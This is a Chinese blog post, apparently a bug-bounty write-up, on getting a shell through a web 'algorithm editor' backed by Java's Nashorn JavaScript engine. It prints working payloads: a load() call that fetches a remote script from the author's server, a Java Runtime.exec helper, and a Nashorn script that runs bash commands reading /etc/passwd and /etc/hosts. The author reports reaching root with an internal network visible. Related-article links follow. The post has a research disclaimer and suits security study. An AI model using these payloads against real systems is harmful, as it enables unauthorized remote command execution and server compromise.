SRC挖掘技巧—写js代码就能getshell

原创 已于 2022-10-24 13:37:50 修改 · 1.8k 阅读 · 2 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#javascript #网络安全 #java #1024程序员节

于 2022-10-16 11:51:55 首次发布
通过算法编辑器尝试执行Node.js代码,发现其调用了Java Nashorn引擎。进一步利用JS代码创建Java对象并执行命令,最终实现了从Web端执行服务器命令。

声明 

   免责声明:本文为个人作品,只做技术研究,只可用于正常的技术交流与学习,不可用于灰黑产业,不可从事违法犯罪行,严禁利用本文所介绍的技术进行未授权的恶意攻击,否则,后果自负!!!

在做功能测试时,关注到一个功能点,看到“算法编辑”感觉很厉害的样子

打开后看看,可以写代码。执行了下,就提示了个这个

查看格式化按钮旁边的【查看帮助接口】 看到里面写的特别像js 代码

结合前期对网站分析。发现后端用的node js,尝试写一个nodejs 代码执行

var process = require('child_process');
var cmd = 'ifconfig';
process.exec(cmd, function(error, stdout, stderr) {
    console.log("error:"+error);
    console.log("stdout:"+stdout);
    console.log("stderr:"+stderr);
});

通过上面报错发现用了java的框架 来执行js 查一下api 教程 ,参考如下资料

介绍 Nashorn —— Java 8 JavaScript 引擎 | 耗子的博客

可以通过load 载入远程脚本

用以下样例脚本测试下。随便打印当前文件路径

var imports = new JavaImporter(java.io, java.lang);
with (imports) {
    var file = new File(__FILE__);
    load('http://106.xxxx5:8989/underscore-min.js');
    print(file.getAbsolutePath());
    // /path/to/my/script.js
}

发现vps 收到请求 ,客户端是java 1.8.0_212

 

服务器的路径也显示出来了

继续看资料 发现 通过 框架可以通过js创建java 对象 使用关键字 Java.type 就可以

于是在本地 导入这个库 模拟下环境。再来写一个 java代码执行的 试试

public static String runCmd(String command) {
    StringBuilder sb =new StringBuilder();
    try {
        Process process=Runtime.getRuntime().exec("cmd /C " + command);
        InputStream inputStream = process.getInputStream();
        InputStreamReader inputStreamReader = new InputStreamReader(inputStream);
        BufferedReader bufferedReader=new BufferedReader(inputStreamReader);
        String line;
        while((line=bufferedReader.readLine())!=null)
        {
            sb.append(line+"\n");
        }
    } catch (Exception e) {
        return null;
    }
    return sb.toString();
    }

当然格式要按照js的方法写

发现成功执行

赶紧拿到web上去测试下。

激动的心情。发现vps成功收到来自web的请求 而且是root权限

请求dnslog

最后改成直接把结果回显到页面上。这样下面得执行日志可以显示执行结果。前面都是无回显得

pwd && ifconfig && cat /etc/passwd

发现还存在内网。因为没有授权。所以点到为止 代码如下

var Runtime = Java.type('java.lang.Runtime');
var InputStreamReader = Java.type('java.io.InputStreamReader');
var BufferedReader = Java.type('java.io.BufferedReader');
var CmdArray = Java.type("java.lang.String[]");
var array = new CmdArray(3);
array[0] = "/bin/bash";
array[1] = "-c";
array[2] = "pwd && ifconfig && cat /etc/hosts";
var process = Runtime.getRuntime().exec(array);
var out = new BufferedReader(new InputStreamReader(process.getInputStream()));
while ((line = out.readLine()) != null) {
  print(line);
}

总结 :

发现算法编辑器->尝试执行nodejs 代码执行->发现调用得是java Nashorn引擎->写js代码调用java 方法执行代码->over!

SRC漏洞挖掘之信息收集
悦分享
07-08 1669
SRC漏洞挖掘或渗透测试中,信息收集占很大一部分,能收集到别人收集不到的资产,就能到别人不到的洞。项目已整理Gitbook文档,方便阅览:Information Collection Handbook由此项目整理的SRC资产信息收集聚合网站:lovebear.top/info -- SRC信息收集导航知道目标域名之后,我们要做的第一件事情就是获取域名的注册信息,包括该域名的DNS服务器信息和注册人的联系信息等。Whois 查询Whois 简单来说,就是一个用来查询域名是否已经被注册,以及注册域名的详细
实战 -- 记一次src小组定向挖掘
qq_29437513的博客
01-03 2479
实战 - 记一次src小组定向挖掘
挖掘src之路
04-24
网络漏洞挖掘 挖掘src之路
SRC挖掘PPT.zip
07-19
src技巧分享,src可以参考,包含《PSRC小目标,挣他一个亿.pdf》《SRC混子是怎样练成的.pdf》《国内SRC漏洞挖掘的一些思路分享.pdf》
SRC漏洞挖掘经验+技巧篇,从零基础入门到精通,收藏这一篇就够了!
最新发布
2401_84578953的博客
09-12 920
本文详细介绍了网络安全漏洞挖掘的完整流程,分为前期信息收集(域名、子域名、敏感信息)、中期信息处理(信息整理和漏洞整理)以及后期漏洞挖掘(功能点分析、参数控制和逻辑漏洞)。文章还解释了安全漏洞的定义、分类及与Bug的区别,并提供了实用技巧。强调信息收集是漏洞挖掘的关键,通过系统化方法和工具,结合对业务的理解,可高效发现各类安全漏洞。虽然是前期,但是却是我认为最重要的一部分;。接下来我就着重说一下我在信息收集方面的心得。1、域名信息收集src一般都只收对应的漏洞,很多src的公告里面就会明确范围;
nodejs脚本中执行shell命令
The limits of your knowledge are the limits of your world
02-21 7745
nodejs脚本中执行shell命令的方法
jsgetshell
weixin_50464560的博客
07-22 734
看到望海师傅的山理证书真滴好看,真想搞一本,刚刚入edusrc的时候收集了一波山理的子域资产,全部看了一遍都被大佬的干干净净了。没有内网VPN基本上不到,然后我就去公众号看了一下,找到了一个系统 首先来点团队特色F12大法,查看html源码发现一处js 发现登录后直接跳转这个地址 直接访问看看有没有未授权漏洞http://xx.xx.xx.xx/index.jsp 访问了好吧,是首页。。打扰了但是我不甘心,我再用F12大法,发现了index.js 访问http://xx.xx.xx.xx/index.
企业SRC漏洞挖掘(赏金)经验
bmaoHk的博客
10-11 1061
文章转载出:使用说明:本篇文章旨在提供网络安全技术研究的信息和知识,以供信息技术专业人士、学者和爱好者学习和交流。我们鼓励读者提升自身的技术能力,增强网络安全意识,并为维护网络空间的安全做出贡献,切勿用于其他不合法事项。SRC,即安全响应中心(Security Response Center),是一个组织或者公司用来接收和处理安全漏洞报告的平台。对于网络安全新手来说,快速挖掘SRC漏洞并报告是一个挑战,但也是一个提升技能和知识的良好机会。
SRC挖掘技巧,需要深入一些 确实能帮助洞漏洞赚取赏金
02-18
嗯,用户想了解SRC挖掘技巧,也就是安全响应中心漏洞挖掘的方法,而且需要深入一些,真正能帮助他们通过洞赚取赏金。首先,我得先确定用户的基础,可能他们已经了解一些基本概念,但需要更高级的技巧。然后,我要...
实战·记一次edusrc证书站的getshell
m0_46736332的博客
03-13 2583
记一次edusrc证书站的漏洞挖掘案例,从信息搜集,目标确认到getshell
src挖掘技巧总结分享
yj520400的博客
04-02 2203
这⽆疑极⼤拓宽了 SSRF 的攻击⾯。查看js源码中,查看是否存在api的接口,如果存在如:/api/register/user 则可以尝试是否存在可以利用点,一般情况下就直接拼接api接口,如果返回报错了,这里可以通过burp抓包工具抓包,查看调用的什么接口,让后观察请求的内容是否有地理位置,如果存在,则使用百度或者其他地理位置查询,查询到坐标后,进行修改。比如首月多少6,第二个月开始20,尝试在购买的时候,分别使用两个支付方式支付,然后都支付后,发现是否使用两个6元支付,是否能获得两个月的。
SRC挖掘思路及方法
热门推荐
m0_65606241的博客
05-11 2万+
最近发现很多刚接触渗透方面的小伙伴都不知道实战挖掘漏洞的诀窍,于是我打算一些自己漏洞的诀窍。
html页面srcjs表达式,JavaScript学习笔记
weixin_29597551的博客
06-04 913
JavaScript-html搭建网页的结构和内容-css用于美化页面-JavaScript 给页面添加动态效果和内容的JS特点-js属于脚本语言,不需要编译,由浏览器解析执行。-js可以嵌入到html代码中。-js基于面向对象,属于弱型语言。JS优点-交互性:可以直接和用户进行交互-安全性:js语言只能访问浏览器内部的数据,不能访问浏览器外部的内容(电脑磁盘中的各种数据)如何引入JS代码1、在元...
实战|全程分析jsgetshell
qq_50854662的博客
09-28 338
本篇转载于https://forum.butian.net/share/260 看到望海师傅的山理证书真滴好看,真想搞一本,刚刚入edusrc的时候收集了一波山理的子域资产,全部看了一遍都被大佬的干干净净了。没有内网VPN基本上不到,然后我就去公众号看了一下,找到... 看到望海师傅的山理证书真滴好看,真想搞一本,刚刚入edusr
重生之我是赏金猎人(三)-无脑挖掘SRC getshell
weixin_44948325的博客
03-26 3244
0x00 项目背景 该系列旨在分享自己和团队在SRC、项目实战漏洞测试过程中的有趣案例,如果读者能从本项目习得一些有用的知识,那么笔者将非常荣幸。 该系列首发github:https://github.com/J0o1ey/BountyHunterInChina 本项目由M78sec维护,未经授权,文章严禁私自修改版权转载。 0x01 前⾔ 有技术交流或渗透测试培训需求的朋友欢迎联系QQ/VX-547006660 0x02 资产收集到脆弱系统 在某src挖掘过程中,本⼈通过ssl证书对域名资产进⾏了收集,通
node.js + postgres 从注入到Getshell
weixin_34313182的博客
11-07 266
【转】http://bobao.360.cn/learning/detail/4657.html 前言(最近你们可能会看到我发很多陈年漏洞的分析,其实这些漏洞刚出来我就想,不过是没时间,拖延拖延,但该做的事迟早要做的,共勉)Postgres是现在用的比较多的数据库,包括我自己的博客,数据库都选择使用Postgres,其优点我就不展开说了。node-postgres是node...
菜刀(代码执行)函数和命令执行函数详解及Getshell方法
dfdhxb995397的博客
06-11 1001
i春秋作家:大家奥斯的哦 原文来自:https://bbs.ichunqiu.com/thread-41471-1-1.html 代码执行函数 VS 命令执行函数 一直想整理这两块的内容,但是一直没时间弄,直到前两天碰上一个入了菜刀马但是死活连不上菜刀的站,顿时不知道怎么继续了,所以就趁这个机会整理了一下代码执行函数怎么getshell和命令执行函数怎么ge...
SRC漏洞挖掘之道(非常详细),零基础入门到精通,看这一篇就够
wly55690的博客
03-08 2243
SRC 需要有一个好心态,国内 SRC 生态并不是很好,SRC 感觉更多的提供了一个相对安全的测试保障,所以更需要抱着一种学习的心态去,将我们学习的到的知识灵活运用,发现新的问题。不要想我今晚一定要到多少漏洞,要拿到多少奖金,不然可能会被忽略三连打崩心态。
plus/mytag_js.php?aid=9090,DeDeCMS(织梦)变量覆盖0day getshell
weixin_35690449的博客
03-23 747
#!usr/bin/php -w<?phperror_reporting(E_ERROR);set_time_limit(0);print_r(´DEDEcms Variable CoverageExploit Author: www.heixiaozi.com www.webvul.com);echo "\r\n";if($argv[2]==null){print_r(´+--------...
一次src挖掘经历
sun_k的博客
01-19 1032
一、详细说明: 在喜马拉雅客服沟通处存在反射型xss漏洞,可以获取cookie信息以及IP地址 二、漏洞证明: 1.输入payload:<img src=a οnerrοr=console.log(“xss”) 可以发现在console中执行 2.与人工客服沟通输入xss平台payload成功获取cookie等信息 三、修复方案: 修复建议对用户的输入进行实体转义或标签黑白名单处理 四、喜马拉雅官方回复为内部已知漏洞 ...
评论 1
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

pyth0nn

送人玫瑰,手留余香

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值